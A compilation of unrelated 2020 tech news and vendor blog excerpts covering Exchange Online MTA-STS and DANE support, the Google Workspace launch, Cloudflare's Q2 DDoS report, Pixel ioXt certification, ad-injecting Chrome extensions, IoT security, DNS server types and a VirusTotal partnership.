Microsoft is working on adding SMTP MTA Strict Transport Security (MTA-STS) support to Exchange Online to ensure Office 365 customers’ email communication security and integrity.
Once MTA-STS is available in Office 365 Exchange Online, emails sent by users via Exchange Online will only one delivered using connections with both authentication and encryption, protecting against both email interception and attacks.
Protection against MITM and downgrade attacks
MTA-STS strengthens Exchange Online email security and solves multiple SMTP security problems including the lack of support for secure protocols, expired TLS certificates, and certs not issued by trusted third parties or matching server domain names.
Given that mail servers will still deliver emails even though a properly secured TLS connection can’t be created, SMTP connections are exposed to various attacks including downgrade and man-in-the-middle attacks.
“[D]owngrade attacks are possible where the STARTTLS response can be deleted, thus rendering the message in clear text,” Microsoft says. “Man-in-the-middle (MITM) attacks are also possible, whereby the message can be rerouted to an attacker’s server.”
“MTA-STS (RFC8461) helps thwart such attacks by providing a mechanism for setting domain policies that specify whether the receiving domain supports TLS and what to do when TLS can’t be negotiated, for example stop the transmission,” the company explains in a Microsoft 365 roadmap entry.
“Exchange Online (EXO) outbound mail flow now supports MTA-STS,” Microsoft also adds.https://www.youtube.com/embed/VY3YvrrHXJk?t=775
Exchange Online SMTP MTA Strict Transport Security (MTA-STS) support is currently in development and the company is planning to make it generally available during December in all environments, for all Exchange Online users.
DNSSEC and DANE for SMTP also coming
Microsoft is also working on including support for the DNSSEC (Domain Name System Security Extensions) and DANE for SMTP (DNS-based Authentication of Named Entities) to Office 365 Exchange Online.
Support for the two SMTP standards will be added to both inbound and outbound mail, “specific to SMTP traffic between SMTP gateways” according to the Microsoft 365 roadmap [1, 2] and this blog post.
According to Microsoft, after including support for the two SMTP security standards in Exchange Online:
DANE for SMTP will provide a more secure method for email transport. DANE uses the presence of DNS TLSA resource records to securely signal TLS support to ensure sending servers can successfully authenticate legitimate receiving email servers. This makes the secure connection resistant to downgrade and MITM attacks.
DNSSEC works by digitally signing records for DNS lookup using public key cryptography. This ensures that the received DNS records have not been tampered with and are authentic.
Microsoft is planning to release DANE and DNSSEC for SMTP in two phases, with the first one to include only outbound support during December 2020 and with the second to add inbound support by the end of next year.
For more than a decade, we’ve been building products to help people transform the way they work.
Now, work itself is transforming in unprecedented ways. For many of us, work is no longer a physical place we go to, and interactions that used to take place in person are being rapidly digitized. Office workers no longer have impromptu discussions at the coffee machine or while walking to meetings together, and instead have turned their homes into workspaces. Frontline workers, from builders on a construction site to delivery specialists keeping critical supply chains moving, are turning to their phones to help get their jobs done. While doctors treating patients and local government agencies engaging with their communities are accelerating how they can use technology to deliver their services.
Amidst this transformation, time is more fragmented—split between work and personal responsibilities—and human connections are more difficult than ever to establish and maintain.
These are unique challenges, but they also represent a significant opportunity to help people succeed in this highly distributed and increasingly digitized world. With the right solution in place, people are able to collaborate more easily, spend time on what matters most, and foster human connections, no matter where they are.
That solution is Google Workspace: everything you need to get anything done, now in one place. Google Workspace includes all of the productivity apps you know and love—Gmail, Calendar, Drive, Docs, Sheets, Slides, Meet, and many more. Whether you’re returning to the office, working from home, on the frontlines with your mobile device, or connecting with customers, Google Workspace is the best way to create, communicate, and collaborate.https://www.youtube.com/embed/bE31y5HbukA
With Google Workspace, we’re introducing three major developments:
a new, deeply integrated user experience that helps teams collaborate more effectively, frontline workers stay connected, and businesses power new digital customer experiences
a new brand identity that reflects our ambitious product vision and the way our products work together
new ways to get started with solutions tailored to the unique needs of our broad range of customers
New user experience
At Next OnAir in July, we announced a better home for work. One that thoughtfully brings together core tools for communication and collaboration—like chat, email, voice and video calling, and content management and collaboration—into a single, unified experience to ensure that employees have access to everything they need in one place. This integrated experience is now generally available to all paying customers of Google Workspace.
In the coming months we’ll also be bringing this new experience to consumers to help them do things like set up a neighborhood group, manage a family budget, or plan a celebration using integrated tools like Gmail, Chat, Meet, Docs, and Tasks.
We’ve already made it easier for business users to connect with customers and partners using guest access features in Chat and Drive, and in the coming weeks, you’ll be able to dynamically create and collaborate on a document with guests in a Chat room. This makes it easy to share content and directly work together with those outside your organization, and ensure that everyone has access and visibility to the same information.
When every minute you spend at work is a minute you could be helping your daughter with her homework, efficiency is everything. We’ve been working hard to add helpful features that make it easier to get your most important work done. For example, in Docs, Sheets, and Slides, you can now preview a linked file without having to open a new tab—which means less time spent moving between apps, and more time getting work done. And beginning today, when you @mention someone in your document, a smart chip will show contact details, including for those outside your organization, provide context and even suggest actions like adding that person to Contacts or reaching out via email, chat or video.
By connecting you to relevant content and people right in Docs, Sheets and Slides, Google Workspace helps you get more done from where you already are.
We also recognize that reinforcing human connections is even more important when people are working remotely and interacting with their customers digitally. It’s what keeps teams together and helps build trust and loyalty with your customers.
Back in July, we shared that we’re bringing Meet picture-in-picture to Gmail and Chat, so you can actually see and hear the people you’re working with, while you’re collaborating. In the coming months, we’ll be rolling out Meet picture-in-picture to Docs, Sheets, and Slides, too. This is especially powerful for customer interactions where you’re pitching a proposal or walking through a document. Where before, you could only see the file you were presenting, now you’ll get all those valuable nonverbal cues that come with actually seeing someone’s face.
And because we know many companies are implementing a mix of remote and in-person work environments, Meet supports a variety of devices with the best of Google AI built-in. From helpful and inclusive Series One hardware kits that provide immersive sound and effortlessly scalability, to native integrations with Chromecast and Nest Smart Displays that make your work experience more enjoyable—whether that’s at home or in the office.
New brand identity
10 years ago, when many of our products were first developed, they were created as individual apps that solved distinct challenges—like a better email with Gmail, or a new way for individuals to collaborate together with Docs. Over time, our products have become more integrated, so much so that the lines between our apps have started to disappear.
Our new Google Workspace brand reflects this more connected, helpful, and flexible experience, and our icons will reflect the same. In the coming weeks, you will see new four-color icons for Gmail, Drive, Calendar, Meet, and our collaborative content creation tools like Docs, Sheets, Slides that are part of the same family. They represent our commitment to building integrated communication and collaboration experiences for everyone, all with helpfulness from Google.https://www.youtube.com/embed/uZXa0N0-Zu0
We are also bringing Google Workspace to our education and nonprofit customers in the coming months. Education customers can continue to access our tools via G Suite for Education, which includes Classroom, Assignments, Gmail, Calendar, Drive, Docs, Sheets, Slides, and Meet. G Suite for Nonprofits will continue to be available to eligible organizations through the Google for Nonprofits program.
New ways to get started
Simplicity, helpfulness, flexibility—these guiding principles apply both to the way people experience our products and to the way we do business. All of our customers share a need for transformative solutions—whether to power remote work, support frontline workers, create immersive digital experiences for their own customers, or all of the above—but their storage, management, and security and compliance needs often vary greatly.
In order to provide more choice and help customers get the most out of Google Workspace, we are evolving our editions to provide more tailored offerings. Our new editions for smaller businesses are aimed at those often looking to make fast, self-serviced purchases. Our editions for larger enterprises are designed to help organizations that have more complex implementation needs and often require technical assistance over the course of a longer buying and deployment cycle.
You can learn more about these new offerings on our pricing page. And existing customers can read more here.
Empowering our customers and partners
You, our customers and our users, are our inspiration as we work together to navigate the change ahead. This is an incredibly challenging time, but we believe it’s also the beginning of a new approach to working together. One that is more productive, collaborative, and impactful.
Google Workspace embodies our vision for a future where work is more flexible, time is more precious, and enabling stronger human connections becomes even more important. It’s a vision we’ve been building toward for more than a decade, and one we’re excited to bring to life together with you.
In the first quarter of 2020, within a matter of weeks, our way of life shifted. We’ve become reliant on online services more than ever. Employees that can are working from home, students of all ages and grades are taking classes online, and we’ve redefined what it means to stay connected. The more the public is dependent on staying connected, the larger the potential reward for attackers to cause chaos and disrupt our way of life. It is therefore no surprise that in Q1 2020 (January 1, 2020 to March 31, 2020) we reported an increase in the number of attacks—especially after various government authority mandates to stay indoors—shelter-in-place went into effect in the second half of March.
In Q2 2020 (April 1, 2020 to June 30, 2020), this trend of increasing DDoS attacks continued and even accelerated:
The number of L3/4 DDoS attacks observed over our network doubled compared to that in the first three months of the year.
The scale of the largest L3/4 DDoS attacks increased significantly. In fact, we observed some of the largest attacks ever recorded over our network.
We observed more attack vectors being deployed and attacks were more geographically distributed.
The number of global L3/4 DDoS attacks in Q2 doubled
Gatebot is Cloudflare’s primary DDoS protection system. It automatically detects and mitigates globally distributed DDoS attacks. A global DDoS attack is an attack that we observe in more than one of our edge data centers. These attacks are usually generated by sophisticated attackers employing botnets in the range of tens of thousand to millions of bots.
Sophisticated attackers kept Gatebot busy in Q2. The total number of global L3/4 DDoS attacks that Gatebot detected and mitigated in Q2 doubled quarter over quarter. In our Q1 DDoS report, we reported a spike in the number and size of attacks. We continue to see this trend accelerate through Q2; over 66% of all global DDoS attacks in 2020 occurred in the second quarter (nearly 100% increase). May was the busiest month in the first half of 2020, followed by June and April. Almost a third of all L3/4 DDoS attacks occurred in May.
In fact, 63% of all L3/4 DDoS attacks that peaked over 100 Gbps occurred in May. As the global pandemic continued to heighten around the world in May, attackers were especially eager to take down websites and other Internet properties.
Small attacks continue to dominate in numbers as big attacks get bigger in size
A DDoS attack’s strength is equivalent to its size—the actual number of packets or bits flooding the link to overwhelm the target. A ‘large’ DDoS attack refers to an attack that peaks at a high rate of Internet traffic. The rate can be measured in terms of packets or bits. Attacks with high bit rates attempt to saturate the Internet link, and attacks with high packet rates attempt to overwhelm the routers or other in-line hardware devices.
Similar to Q1, the majority of L3/4 DDoS attacks that we observed in Q2 were also relatively ‘small’ with regards to the scale of Cloudflare’s network. In Q2, nearly 90% of all L3/4 DDoS attacks that we saw peaked below 10 Gbps. Small attacks that peak below 10 Gbps can still easily cause an outage to most of the websites and Internet properties around the world if they are not protected by a cloud-based DDoS mitigation service.
Similarly, from a packet rate perspective, 76% of all L3/4 DDoS attacks in Q2 peaked up to 1 million packets per second (pps). Typically, a 1 Gbps Ethernet interface can deliver anywhere between 80k to 1.5M pps. Assuming the interface also serves legitimate traffic, and that most organizations have much less than a 1 Gbps interface, you can see how even these ‘small’ packet rate DDoS attacks can easily take down Internet properties.
In terms of duration, 83% of all attacks lasted between 30 to 60 minutes. We saw a similar trend in Q1 with 79% of attacks falling in the same duration range. This may seem like a short duration, but imagine this as a 30 to 60 minute cyber battle between your security team and the attackers. Now it doesn’t seem so short. Additionally, if a DDoS attack creates an outage or service degradation, the recovery time to reboot your appliances and relaunch your services can be much longer; costing you lost revenue and reputation for every minute.
In Q2, we saw the largest DDoS attacks on our network, ever
This quarter, we saw an increasing number of large scale attacks; both in terms of packet rate and bit rate. In fact, 88% of all DDoS attacks in 2020 that peaked above 100 Gbps were launched after shelter-in-place went into effect in March. Once again, May was not just the busiest month with the most number of attacks, but also the greatest number of large attacks above 100 Gbps.
From the packet perspective, June took the lead with a whopping 754 million pps attack. Besides that attack, the maximum packet rates stayed mostly consistent throughout the quarter with around 200 million pps.
The 754 million pps attack was automatically detected and mitigated by Cloudflare. The attack was part of an organized four-day campaign that lasted from June 18 to the 21. As part of the campaign, attack traffic from over 316,000 IP addresses targeted a single Cloudflare IP address.
Cloudflare’s DDoS protection systems automatically detected and mitigated the attack, and due to the size and global coverage of our network, there was no impact to performance. A global interconnected network is crucial when mitigating large attacks in order to be able to absorb the attack traffic and mitigate it close to the source, whilst also continuing serving legitimate customer traffic without inducing latency or service interruptions.
The United States is targeted with the most attacks
When we look at the L3/4 DDoS attack distribution by country, our data centers in the United States received the most number of attacks (22.6%), followed by Germany (4.4%), Canada (2.7%) and Great Britain (2.6%).
However when we look at the total attack bytes mitigated by each Cloudflare data center, the United States still leads (34.9%), but followed by Hong Kong (6.6%), Russia (6.5%), Germany (4.5%) and Colombia (3.7%). The reason for this change is due to the total amount of bandwidth that was generated in each attack. For instance, while Hong Kong did not make it to the top 10 list due to the relatively small number of attacks that was observed in Hong Kong (1.8%), the attacks were highly volumetric and generated so much attack traffic that pushed Hong Kong to the 2nd place.
When analyzing L3/4 DDoS attacks, we bucket the traffic by the Cloudflare edge data center locations and not by the location of the source IP. The reason is when attackers launch L3/4 attacks they can ‘spoof’ (alter) the source IP address in order to obfuscate the attack source. If we were to derive the country based on a spoofed source IP, we would get a spoofed country. Cloudflare is able to overcome the challenges of spoofed IPs by displaying the attack data by the location of Cloudflare’s data center in which the attack was observed. We’re able to achieve geographical accuracy in our report because we have data centers in over 200 cities around the world.
57% of all L3/4 DDoS attacks in Q2 were SYN floods
An attack vector is a term used to describe the attack method. In Q2, we observed an increase in the number of vectors used by attackers in L3/4 DDoS attacks. A total of 39 different types of attack vectors were used in Q2, compared to 34 in Q1. SYN floods formed the majority with over 57% in share, followed by RST (13%), UDP (7%), CLDAP (6%) and SSDP (3%) attacks.
SYN flood attacks aim to exploit the handshake process of a TCP connection. By repeatedly sending initial connection request packets with a synchronize flag (SYN), the attacker attempts to overwhelm the router’s connection table that tracks the state of TCP connections. The router replies with a packet that contains a synchronized acknowledgment flag (SYN-ACK), allocates a certain amount of memory for each given connection and falsely waits for the client to respond with a final acknowledgment (ACK). Given a sufficient number of SYNs that occupy the router’s memory, the router is unable to allocate further memory for legitimate clients causing a denial of service.
No matter the attack vector, Cloudflare automatically detects and mitigates stateful or stateless DDoS attacks using our 3 pronged protection approach comprising of our home-built DDoS protection systems:
Gatebot – Cloudflare’s centralized DDoS protection systems for detecting and mitigating globally distributed volumetric DDoS attacks. Gatebot runs in our network’s core data center. It receives samples from every one of our edge data centers, analyzes them and automatically sends mitigation instructions when attacks are detected. Gatebot is also synchronized to each of our customers’ web servers to identify its health and triggers accordingly, tailored protection.
dosd (denial of service daemon) – Cloudflare’s decentralized DDoS protection systems. dosd runs autonomously in each server in every Cloudflare data center around the world, analyzes traffic, and applies local mitigation rules when needed. Besides being able to detect and mitigate attacks at super fast speeds, dosd significantly improves our network resilience by delegating the detection and mitigation capabilities to the edge.
flowtrackd (flow tracking daemon) – Cloudflare’s TCP state tracking machine for detecting and mitigating the most randomized and sophisticated TCP-based DDoS attacks in unidirectional routing topologies. flowtrackd is able to identify the state of a TCP connection and then drops, challenges or rate-limits packets that don’t belong to a legitimate connection.
In addition to our automated DDoS protection systems, Cloudflare also generates real-time threat intelligence that automatically mitigates attacks. Furthermore, Cloudflare provides its customers firewall, rate-limiting and additional tools to further customize and optimize their protection.
Cloudflare DDoS mitigation
As Internet usage continues to evolve for businesses and individuals, expect DDoS tactics to adapt as well. Cloudflare protects websites, applications, and entire networks from DDoS attacks of any size, kind, or level of sophistication.
Our customers and industry analysts recommend our comprehensive solution for three main reasons:
Network scale: Cloudflare’s 37 Tbps network can easily block attacks of any size, type, or level of sophistication. The Cloudflare network has a DDoS mitigation capacity that is higher than the next four competitors—combined.
Time-to-mitigation: Cloudflare mitigates most network layer attacks in under 10 seconds globally, and immediate mitigation (0 seconds) when static rules are preconfigured. With our global presence, Cloudflare mitigates attacks close to the source with minimal latency. In some cases, traffic is even faster than over the public Internet.
Threat intelligence: Cloudflare’s DDoS mitigation is powered by threat intelligence harnessed from over 27 million Internet properties on it. Additionally, the threat intelligence is incorporated into customer facing firewalls and tools in order to empower our customers.
Cloudflare is uniquely positioned to deliver DDoS mitigation with unparalleled scale, speed, and smarts because of the architecture of our network. Cloudflare’s network is like a fractal—every service runs on every server in every Cloudflare data center that spans over 200 cities globally. This enables Cloudflare to detect and mitigate attacks close to the source of origin, no matter the size, source, or type of attack.
You can also join an upcoming live webinar where we will be discussing these trends, and strategies enterprises can implement to combat DDoS attacks and keep their networks online and fast.
Trust is very important when it comes to the relationship between a user and their smartphone. While phone functionality and design can enhance the user experience, security is fundamental and foundational to our relationship with our phones.There are multiple ways to build trust around the security capabilities that a device provides and we continue to invest in verifiable ways to do just that.
The Internet of Secure Things Alliance (ioXt) manages a security compliance assessment program for connected devices. ioXt has over 200 members across various industries, including Google, Amazon, Facebook, T-Mobile, Comcast, Zigbee Alliance, Z-Wave Alliance, Legrand, Resideo, Schneider Electric, and many others. With so many companies involved, ioXt covers a wide range of device types, including smart lighting, smart speakers, webcams, and Android smartphones.
The core focus of ioXt is “to set security standards that bring security, upgradability and transparency to the market and directly into the hands of consumers.” This is accomplished by assessing devices against a baseline set of requirements and relying on publicly available evidence. The goal of ioXt’s approach is to enable users, enterprises, regulators, and other stakeholders to understand the security in connected products to drive better awareness towards how these products are protecting the security and privacy of users.
ioXt’s baseline security requirements are tailored for product classes, and the ioXt Android Profile enables smartphone manufacturers to differentiate security capabilities, including biometric authentication strength, security update frequency, length of security support lifetime commitment, vulnerability disclosure program quality, and preloaded app risk minimization.
We believe that using a widely known industry consortium standard for Pixel certification provides increased trust in the security claims we make to our users. NCC Group has published an audit report that can be downloaded here. The report documents the evaluation of Pixel 4/4 XL and Pixel 4a against the ioXt Android Profile.
Security by Default is one of the most important criteria used in the ioXt Android profile. Security by Default rates devices by cumulatively scoring the risk for all preloads on a particular device. For this particular measurement, we worked with a team of university experts from the University of Cambridge, University of Strathclyde, and Johannes Kepler University in Linz to create a formula that considers the risk of platform signed apps, pregranted permissions on preloaded apps, and apps communicating using cleartext traffic.
In partnership with those teams, Google created Uraniborg, an open source tool that collects necessary attributes from the device and runs it through this formula to come up with a raw score. NCC Group leveraged Uraniborg to conduct the assessment for the ioXt Security by Default category.
As part of our ongoing certification efforts, we look forward to submitting future Pixel smartphones through the ioXt standard, and we encourage the Android device ecosystem to participate in similar transparency efforts for their devices.
Acknowledgements: This post leveraged contributions from Sudhi Herle, Billy Lau and Sam Schumacher
More than 80 million Chrome users have installed one of 295 Chrome extensions that hijack and insert ads inside Google and Bing search results.
The malicious extensions were discovered by AdGuard, a company that provides ad-blocking solutions, while the company’s staff was looking into a series of fake ad-blocking extensions that were available on the official Chrome Web Store.
A subsequent investigation into the fake ad blockers unearthed a larger group of malicious activity spreading across 295 extensions.
Besides fake ad blockers, AdGuard said it also found extensions posing as weather forecast widgets and screenshot capture utilities.
However, the vast majority of the malicious extensions (245 out of the 295 extensions) were simplistic utilities that had no other function than to apply a custom background for Chrome’s “new tab” page.
In a technical analysis shared with ZDNet, AdGuard said all extensions loaded malicious code from the fly-analytics.com domain, and then proceeded to quietly inject ads inside Google and Bing search results.
Almost all the 295 extensions were still available on the official Chrome Web Store earlier today, when we received the list from AdGuard.https://platform.twitter.com/embed/index.html?creatorScreenName=ZDNet&dnt=false&embedId=twitter-widget-0&frame=false&hideCard=false&hideThread=false&id=1290674805365264386&lang=en&origin=https%3A%2F%2Fwww.zdnet.com%2Farticle%2Fcluster-of-295-chrome-extensions-caught-hijacking-google-and-bing-search-results%2F&siteScreenName=ZDNet&theme=light&widgetsVersion=223fc1c4%3A1596143124634&width=550px
Extensions started being pulled down from the store after we reached out to Google’s Web Store team and after AdGuard published a blog post detailing their findings.
The same blog post also details additional bad practices on the Chrome Web Store, such as store moderators allowing a large number of copycat extensions to clone popular add-ons, capitalize on their brands, reach millions of users, while also containing malicious code that performs ad fraud or cookie stuffing.
The full list of 295 ad-injecting extensions is available below, at the end of this article.
When Google removes an extension from the Chrome Web Store for malicious activity, the extension is also disabled in users’ browsers and marked as “malware” in Chrome’s Extension section.
Users still have to manually uninstall it from their browsers.
We believe that WISPs serve a crucial role in these difficult times by providing Internet connectivity to all our communities. Our goal with UNMS Cloud and CRM is to empower WISPs with world-class tools and services so that they can focus on connecting the world.
That’s why we are proud to introduce the Ubiquiti Payment Gateway.
Easy and Affordable Payment Processing
We know that fees can add up. That’s why Ubiquiti Payment Gateway is offering an industry-leading processing fee of 1.9%+30c per transaction for the first year.
Better yet, the UPG is simple to use! No need to set up accounts with other payment gateways or use a separate site to manage your subscriptions – simply activate the UPG with a few clicks, go through our quick onboarding process, and you will be using the UPG in no time.
If you are currently using other payment options for your subscriptions, you can easily switch to the UPG from the billing settings. We will continue to support other payment options, if you prefer to keep your existing payment processors.
For now, Ubiquiti Payment Gateway is only available in the United States, but we are working to bring it to other countries. Stay tuned.
Automatic Payments
The UPG isn’t the only thing we’ve been working on. We know that managing monthly payments can be time-consuming. That’s why we have built autopayments into the latest release of CRM. You can activate it in the billing settings:
Autopayments can be set to trigger at invoice creation date or at the due date. No more need to keep track of due dates!
An IoT device is simply any physical device with a defined purpose that has an operating system and can communicate through the internet with other things. Projections show that by 2021, about 25 billion IoT devices will be in operation, and 75 billion by the year 2025.
The support of so many connected devices used to be impossible. Now, advances in technology such as IPv6—the communications protocol that provides an identification and location system for computers on networks and routes traffic across the Internet—and 5G is enabling the IoT revolution.
Benefits of IoT
The benefits of IoT span across all industries, including agriculture and healthcare, but personal lives are enhanced by IoT as well. For example, IoT thermostats monitor and control temperature, which is both convenient and cost saving. Smart watches and Fitbits monitor health stats such as pulse and steps, going so far as to send this information to a doctor or sounding an alert if a risk is detected. Smart cities, homes, and cars are other large-scale examples of IoT. While the ultimate realization of these technologies is a long way off and involves the use of imagination, advancements in IoT aren’t slowing down.
In fact, wearables are a perfect example of this. What was once a clunky step-tracking device is now a fashion statement that serves multiple purposes. In addition, designers and engineers are playing with fabrics that can be interwoven with IoT components so a sport shoe can measure speed, heartbeat, and sweat output or a jacket can charge phones.
Cyber Security With Wearables
However, wearables are prone to cyber attacks. While not a wearable but similar, a connected pacemaker was compromised in 2018, which opened the eyes to the industry of the associated risks that come along with IoT devices. As Dr. Antoniou explains, “The pacemaker was compromised through a remote execution of the code into the person who was having the pacemaker.”
Manufacturers of connected wearables must practice their due diligence to ensure that the security of devices is done correctly. Dr Antoniou emphasizes that the onus lays on the manufacturer.
Smart Cities and IoT
When people think of smart cities, they often envision traffic signals that change according to the current traffic pattern, tickets handed out automatically after cameras catch illegal incidents, or tolls automatically deducted from checking accounts when a sensor deems it appropriate. Smart cities are so much more than that, however.
Dr. Antoniou explains that a smart city exists as an ecosystem of those sensor components plus the services the city is providing. That includes public lighting, smart roads and parks, and free Wi-Fi across the city. Services include DMV renewal and efficiency measures that help keep costs and resource draining low through the use of a connected device or app.
Enterprise IoT
Enterprise IoT, also called Industry 4.0 consists of IoT devices that are designed to operate within a business to drive efficiency, effectiveness, and cost savings. Examples include voiceover IP phones, smart lighting within the building, and smart TVs and vending machines located in an enterprise building. With these tools, internet connection enables TVs with internet access and vending machines can take debit cards. Security features like cameras and intrusion detection also fall into the realm of Enterprise IoT.
There is some concern that Industry 4.0 will eliminate jobs, but Dr. Antoniou believes the contrary. “I think we will see some reduction in certain jobs, but then we will see more demand in other jobs. As we know, cyber security is a very hot field nowadays, and if you go to the Department of Labor, you can see millions of openings especially in cyber security.” He goes on to explain that what IT administration and project management jobs are lost to IoT, cyber security jobs will fill—and then some. He also believes any collateral damage will be worth one other key benefit: sustainability.
“Sustainability is a big, big issue and a trending around the globe. So these devices, they will be helping us to accomplish [the things that make] a better planet: reduce waste [and] make more effective use of resources and consumption.”
On-Prem IoT Security
Many at-home IoT devices run on Wi-Fi connected to home modems. Dr. Antoniou encourages everyone who purchases a new IoT device to always read the manufacturer instructions in order to understand what kind of security parameters and configurations need to be put in place for that device. He also talks about Rule Zero, or his firewall rule. “I explicitly deny everything inbound to my home… That would protect your IoT, but also your other devices that are connected to your home network.”
Dr. Antoniou stresses the fact that IoT technology is still in its infancy. There are a lot of security and connectivity kinks to be worked out. Too many manufacturers are rolling out new, snazzy devices without actively imagining all the future security risks the device may enable. Cyber security needs to be an active part of the manufacturing supply chain.
Digital Identities
Finally, each device must have its own digital identity, or an identity that the device can assume for the entirety of its life. “So the digital identities on the IoTs, it is similar to what we call the identity access management, and it's important to have them. And today, we don't have a centralized digital identity management for IoTs.” Dr. Antoniou is an expert in the future of digital identity evolution: “if you get that digital ID and marry it with a microchip that is embedded to this device and it creates a strong encryption algorithm and somehow creates a digital ID in a centralized identity and access management database that is utilizing blockchain for verification, authentication, and authorization, that device now has a digital ID. It has a body of existence.”
Humans are defined with a social security number which enable transactions like home loans or tax payments. Digital identities for IoT devices identify them within their ecosystem. From there, authorization is granted only to the IDs of the devices we want active on our home or enterprise network. This system is not currently in place. For example, a rogue employee could potentially go to work, pair their smart witch with a Bluetooth device, piggyback into the work network, and steal data. If that smart watch had a digital ID, the network would know instantly that it doesn’t belong.
Currently, Dr. Antoniou explains that the best defense to IoT threats is enterprise education and policy. By running a risk analysis, companies start to think about connectivity as a whole. From there, they can create policies and train employees on those policies.
When asked about current IoT regulations, Dr. Antoniou exhaustedly explains that there aren’t any. Some countries are farther ahead than others, however, and most countries are working on them. Also, there are commonly-accepted preliminary guidelines. “NIST the National Institute of Standards and Technology, run by United States government, has some preliminary frameworks for IoT, but it has not been come to a fruition as a standard yet.”
In today’s blog post, we’ll talk about the difference between authoritative and recursive domain name system (DNS) servers. We’ll explain how these two types of DNS servers form the foundation of the internet and help the world stay connected.
What is the domain name system?
Every computer on the Internet identifies itself with an “Internet Protocol” or “IP” address, which is a series of numbers — just like a phone number. That means you can contact any of those computers by typing in the website name, or you can type the IP address into your browser address bar. Either method will get you to the same destination. All servers that host websites and apps on the internet have IP addresses, too.
Give it a try: the IP address of the Cisco Umbrella website is 67.215.70.40.
The domain name system (DNS) is sometimes referred to as the “phone book” of the Internet. You can connect to our website by typing in the IP address in the address bar of your browser, but it’s much easier to type in umbrella.cisco.com. DNS was invented so that people didn’t need to remember long IP address numbers (like phone numbers) and could look up websites by human-friendly names like umbrella.cisco.com instead.
There are too many sites on the Internet for your personal computer to keep a complete list. DNS servers power a website directory service to make things easier for humans. Like phone books, you won’t find one big book that contains every listing for everyone in the world (how many pages would that require? That’s a question for a different blog post.)
There are two types of DNS servers: authoritative and recursive. Authoritative nameservers are like the phone book company that publishes multiple phone books, one per region. Recursive DNS servers are like someone who uses a phone book to look up the number to contact a person or company. Keep in mind, these companies don’t actually decide what number belongs to which person or company — that’s the responsibility of domain name registrars.
Let’s talk about the two different types in more detail.
What is a recursive DNS server?
When you type a website address into your browser address bar, it might seem like magic happens. In reality, the DNS system makes effortless internet browsing possible. First, your browser connects to a recursive DNS server. There are many thousands of recursive DNS servers in the world. Many people use the recursive DNS servers managed by their Internet Service Provider (ISP) and never change them. If you’re a Cisco Umbrella customer, you’re using our recursive DNS servers instead.
Once your computer connects to its assigned recursive DNS server, it asks the question “what’s the IP address assigned to that website name?” The recursive DNS server doesn’t have a copy of the phone book, but it does know where to find one. So it connects to another type of DNS server to continue the search.
What is an authoritative DNS nameserver?
The second type of DNS server holds a copy of the regional phone book that matches IP addresses with domain names. These are called authoritative DNS servers. Authoritative DNS nameservers are responsible for providing answers to recursive DNS nameservers about where specific websites can be found. These answers contain important information for each domain, like IP addresses.
Like phone books, there are different authoritative DNS servers that cover different regions (a company, the local area, your country, etc.) No matter what region it covers, an authoritative DNS server performs two important tasks. First, it stores lists of domain names and their associated IP addresses. Second, it responds to requests from a recursive DNS server (the person who needs to look up a number) about the correct IP address assigned to a domain name. After getting the answer, the recursive DNS server sends that information back to the computer (and browser) that requested it. The computer connects to the IP address, and the website loads, leading to a happy user who can go on with their day.
Putting it all together
This process happens so quickly that you don’t even notice it happening — unless, of course, something is broken.
Let’s use a real world example. Imagine that you are sitting at your computer and you want to search for pictures of cats wearing bow ties (hey, we don’t judge). So you decide to visit Google to do a web search.
First, you type www.google.com into your web browser. However, your computer doesn’t know the IP address of the server for www.google.com. So your computer starts by sending a query to its assigned recursive DNS nameserver. For this example, we’ll assume you’re one of our customers., So it’s a Cisco Umbrella server. Your computer asks the recursive DNS server to locate the IP address of www.google.com. The Cisco Umbrella recursive DNS nameserver is now assigned the task of finding the IP address of the website. Google is a popular website, so its result will probably be cached. But if the recursive DNS nameserver did not already have a DNS record for www.google.com cached in its system, it will need to ask for help from the authoritative DNS hierarchy to get the answer. This is more likely if you are going to a website that is newer or less popular.
Each part of a domain like www.google.com has a specific authoritative DNS nameserver (or group of redundant authoritative nameservers).
At the top of the server tree are the root domain nameservers. Every website address has an implied “.” at the end, even if we don’t type it in. This “.” designates the DNS root nameservers at the top of the DNS hierarchy. The root domain nameservers will know the IP addresses of the authoritative nameservers that handle DNS queries for the Top Level Domains (TLD) like “.com”, “.edu”, or “.gov”. The Umbrella recursive DNS server first asks the root domain nameserver for the IP address of the .com TLD server, since www.google.com is within the .com TLD.
The root domain nameserver responds with the address of the TLD server. Next, the Umbrella recursive DNS server asks the TLD authoritative server where it can find the authoritative DNS server for www.google.com. The TLD authoritative server responds, and the process continues. The authoritative server for www.google.com is asked where to find www.google.com and the server responds with the answer.Once the Cisco Umbrella recursive DNS server knows the IP address for the website, it responds to your computer with the appropriate IP address. Your browser loads Google, and you can get started with more important business: finding pictures of cats in bow ties.
Without DNS, the internet stops working
The DNS system is so important to the modern world that we often refer to it as the foundation of the internet. If your recursive DNS service breaks for some reason, you won’t be able to connect to websites unless you type in the IP addresses directly — and who keeps an emergency list of IP addresses in their desk? If the recursive DNS service you use is working, but has been slowed down for some reason (like a cyberattack), then your connection to websites will be slowed down, too.
Cisco Umbrella launched its recursive DNS service in 2006 (as OpenDNS) to provide everyone with reliable, safe, smart, and fast Internet connectivity. Umbrella has a highly resilient recursive DNS network. We’ve had 100% uptime with no DNS outages in our history. Our 30-plus worldwide data centers use anycast routing to send requests transparently to the fastest available data center with automatic failover.
By configuring your network to use Umbrella’s recursive DNS service, you’ll get the fastest and most reliable connectivity you can imagine. But Umbrella provides much more than just plain old internet browsing. Learn more about how we make the internet a safer place for cats in bow ties in our post about DNS-layer security.
VirusTotal, the famous multi-antivirus scanning service owned by Google, recently announced new threat detection capabilities it added with the help of an Israeli cybersecurity firm.
VirusTotal provides a free online service that analyzes suspicious files and URLs to detect malware and automatically shares them with the security community. With the onslaught of new malware types and samples, researchers rely on the rapid discovery and sharing provided by VirusTotal to keep their companies safe from attacks.
VirusTotal relies on a continuous stream of new malware discoveries to protect its members from significant damage.
Cynet, the creator of the autonomous breach protection platform, has now integrated its Cynet Detection Engine into VirusTotal.
The benefits of this partnership are twofold. First, Cynet provides the VirusTotal partner network cutting-edge threat intelligence from its ML-based detection engine (CyAI) that actively protects the company's clients around the globe.
CyAI is a continuously learning and evolving detection model that routinely contributes information about new threats that are not available in VirusTotal. Although many vendors are using AI/ML models, the ability of the models to detect new threats vary greatly.
Cynet routinely outperforms third party and open source detection platforms and is frequently relied upon in incident response cases when underlying threats remain hidden from other solutions.
